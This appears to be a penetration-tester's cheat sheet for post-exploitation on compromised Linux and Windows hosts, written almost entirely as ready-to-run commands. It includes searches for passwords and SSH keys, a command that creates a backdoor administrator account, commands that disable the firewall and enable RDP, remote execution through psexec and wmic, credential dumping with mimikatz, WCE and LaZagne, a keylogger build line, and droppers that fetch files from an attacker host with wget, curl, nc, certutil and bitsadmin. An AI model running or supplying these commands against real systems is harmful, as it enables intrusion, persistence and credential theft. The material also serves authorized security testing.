Linux Post-exploitation
- Check wrong permissions:
Find setuid binaries:
find / -perm -4000 -ls 2> /dev/null
Find files world writable:
find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null
Find directories world writable:
find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
Look for interesting files:
find / -name "*.txt" -ls 2> /dev/null find / -name "*.log" -ls 2> /dev/null
Check sudo:
sudo su sudo -l
Decrypt PKCS#12 objects:
openssl pkcs12 -info -in $FILE
Show certs in PKCS#7 file:
openssl pkcs7 -print_certs -inform DER -in $FILE openssl smime -verify -in signed.p7 -inform pem openssl smime -verify -in signed.p7 -inform der
Show keystore content:
keytool -list -v -keystore keystore.jks
- Commands for information gathering:
ps -ef
mount
/sbin/ifconfig -a
route -n
cat /etc/crontab ls -la /var/spool/cron*/ ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu
Find users with shell access:
egrep -e '/bin/(ba)?sh' /etc/passwd
Check bootup services:
ls /etc/rc*
SSH relationships and logins:
cat ~/.ssh/*
References:
Tools:
- http://pentestmonkey.net/tools/audit/unix-privesc-check
- https://github.com/sleventyeleven/Linuxprivchecker
- https://github.com/rebootuser/LinEnum
Windows Post-exploitation
Check filesystem:
Like “ls -la” in Linux:
dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt dir /s /b C:\ | findstr /E ".log" > log.txt dir /s /b C:\ | findstr /E ".doc" > doc.txt dir /s /b C:\ | findstr /E ".xls" > xls.txt dir /s /b C:\ | findstr /E ".xml" > xml.txt
Compute MD5 hash:
Get-FileHash -Algorithm MD5 -Path .\$FILE
Check registry:
reg query HKLM /f password /t REG_SZ /s > hklm_password.txt reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt
Check scheduler:
schtasks /query /fo LIST /v > schtasks.txt tasklist /SVC > tasklist.txt
Other checks:
DRIVERQUERY wmic os where Primary='TRUE' reboot
List hotfixes:
wmic qfe
notepad myfile.txt:lion.txt eventvwr.exe quser > rdp.txt netstat -an > netstat.txt netsh firewall show config > firewall.txt icacls service.exe type C:\Windows\System32\drivers\etc\hosts
Wmic commands:
wmic service get name,displayname,pathname,startmode > wmic_service.txt wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect wmic /node:"" product get name,version,vendor wmic process get Caption,CommandLine wmic printer list status wmic cpu get
List SIDs of the system (as admin):
wmic useraccount get name,sid,fullname
Net commands:
net view net view \\host net share net use z: \\host\dir net users net user %username% net config rdr
Backdoor account:
net user hax0r hax0r /add net localgroup administrators hax0r /add net localgroup "Remote Desktop users" hax0r /add
Check routing/network information:
route print arp -A ipconfig /all getmac
Show files attributes / permissions
cacls cmd.exe attrib cmd.exe
List services:
sc queryex type=service state=all net start
Other info:
systeminfo whoami
Idem for Win XP:
echo %USERNAME%
- Firewall
netsh firewall show stat netsh firewall show config netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000 netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080 netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
Disable firewall:
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
- RDP
Show RDP sessions:
quser qwinsta reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service type=remotedesktop mode=enable net start termservice net start "Terminal Services" svchost.exe -k termsvcs tasklist /svc /S servername/U username /P password
Change RDP daemon status from Meterpreter (more Meterpreter commands in Metasploit Meterpreter Cheat Sheet)
msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1
Change RDP port:
\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389Remote Execution commands:
wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber tasklist.exe /S $IP /U domain\username tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running" taskkill.exe /S $IP /U domain\username /F /FI "norton" quser /SERVER:$IP
From sysinternals psexec:
psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1
Copy a file to the target host AND execute it:
psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp
Authenticated WMI Exec via Powershell
msf > use exploit/windows/local/ps_wmi_exec msf exploit(windows/local/ps_wmi_exec) > show options Module options (exploit/windows/local/ps_wmi_exec): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN no Domain or machine name PASSWORD no Password to authenticate with RHOSTS no Target address range or CIDR identifier SESSION yes The session to run this module on. USERNAME no Username to authenticate as Exploit target: Id Name -- ---- 0 Universal msf exploit(windows/local/ps_wmi_exec) >
In the same host but with other role:
runas /user:administrator cmd runas /noprofile /user:DOMAIN\administrator cmd runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"
Windows exploit suggester (OBSOLETE)
WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)
python windows-exploit-suggester.py --update python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
Tools for information gathering
Manual method
dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent dir %USERPROFILE%\Favorites type C:\Windows\System32\drivers\etc\hosts
LaZagne
Download LaZagne from https://github.com/AlessandroZ/LaZagne
laZagne.exe all laZagne.exe browsers laZagne.exe browsers -firefox
RATs (Remote Administration Tools)
- Pupy https://github.com/n1nj4sec/pupy: opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Sniffers
Sniffers for Windows
Install Wireshark, also use in console dumpcap:
dumpcap -D dumpcap -i $IFACE
Keyloggers for Windows
Windows keylogger (no admin rights):
To cross-compile it for Windows:
i686-w64-mingw32-g++ klog_main.cpp -o klog -static
Network sniffers for Linux
tcpdump -X -s 0 -i $INTERFACE
Password dumping
mimikatz
mimikatz.exe mimikatz> privilege::debug mimikatz> sekurlsa::logonPasswords mimikatz> sekurlsa::msv
Fgdump
Dumps hashes (needs SYSTEM privileges)
fgdump.exe
WCE (Windows Credential Editor)
Dumps clear passwords:
wce -w
Dumps hashes:
wce
Persistent, writes in credentials.txt:
wce -r
Change your credentials in memory:
wce -s
Droppers
Droppers are programs that allows you to download tools, trojans, etc to the target machine to follow the compromise locally.
Droppers using Linux
wget http://$IP/file curl -k https://$IP/file > file nc -nvv $IP 8080 > file scp $FILE [email protected]$IP:~
Droppers using Windows
Powershell
curl -Uri $URL
See also Powercat in the Powershell frameworks section.
ROBOCOPY
NET USE \\$IP\IPC$ /USER:DOMAIN\USER ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z NET USE \\$IP\IPC$ /D
BITSAdmin
https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool
Direct Transfer:
bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE
Using a download queue:
bitsadmin /create myDownloadJob bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
Certutil
certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe
Notepad
notepad.exe http://$IP/file.txt
Living Off the Land (LOLbins) for Windows
Links:
- https://github.com/LOLBAS-Project/LOLBAS
- https://lolbas-project.github.io/
- https://gtfobins.github.io/
- https://github.com/Arno0x/CSharpScripts
- https://gist.github.com/jstangroome/9adaa87a845e5be906c8
- https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1
Examples:
hh.exe C:\windows\system32\calc.exe
C# compiler built-in command:
csc.exe
Droppers Using known protocols
HTTP
Python2
python -m SimpleHTTPServer
python -m SimpleHTTPServer 80
Python3
python3 -m http.server 8080
Php
php -S localhost:8000
Ruby
ruby -run -e httpd . -p 8000
FTP
pip install pyftpdlib python -m pyftpdlib
SMB
impacket-smbserver PAYLOADS /root/payload
As part of the post-exploitation part we can also perform Data Exfiltration.
